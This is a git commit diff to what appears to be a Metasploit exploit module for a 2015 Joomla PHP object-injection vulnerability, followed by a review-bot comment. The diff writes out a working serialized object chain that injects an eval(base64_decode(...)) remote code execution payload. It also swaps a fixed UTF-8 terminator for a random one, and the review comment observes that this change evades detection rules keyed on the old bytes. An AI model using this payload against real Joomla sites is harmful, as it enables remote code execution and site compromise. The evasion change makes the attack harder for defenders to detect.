add random terminator and clarify target

bug/bundler_fix
Christian Mehlmauer 2015-12-17 00:08:52 +01:00
parent 08d0ffd709
commit 8c43ecbfaf
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
1 changed files with 11 additions and 5 deletions


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Joomla < 3.4.6', {}]],
'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],
'DisclosureDate' => 'Dec 14 2015',
'DefaultTarget' => 0)
)
@ -140,13 +140,19 @@ class Metasploit3 < Msf::Exploit::Remote
Exploit::CheckCode::Safe
end
# gets a random 4 byte UTF-8 character
def get_terminator
# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
[rand(0x10000..0x10ffff)].pack('U*')
end
def get_payload(header_name)
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
pre_pay = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
post = "\xF0\x9D\x8C\x86"
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
post_pay = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
t1000 = get_terminator
return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{t1000}"
end
def print_status(msg='')
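Review bot: In the second hunk, the comment on `get_terminator` says what it returns but not why the serialized string has to end in a 4-byte UTF-8 character, and the local `t1000` in `get_payload` gives no hint either. A one-line why-comment on the method plus `terminator = get_terminator` would make the payload layout readable. The explicit `return` on the last line of `get_payload` is unnecessary in Ruby, because the interpolated string can simply be the final expression. For anyone maintaining detection content: the fixed bytes `\xF0\x9D\x8C\x86` are replaced by a random code point in U+10000–U+10FFFF, so a rule keyed on that literal sequence will no longer match requests built by this module, while the serialized class names in `pre_pay` stay constant and are the steadier thing to match on.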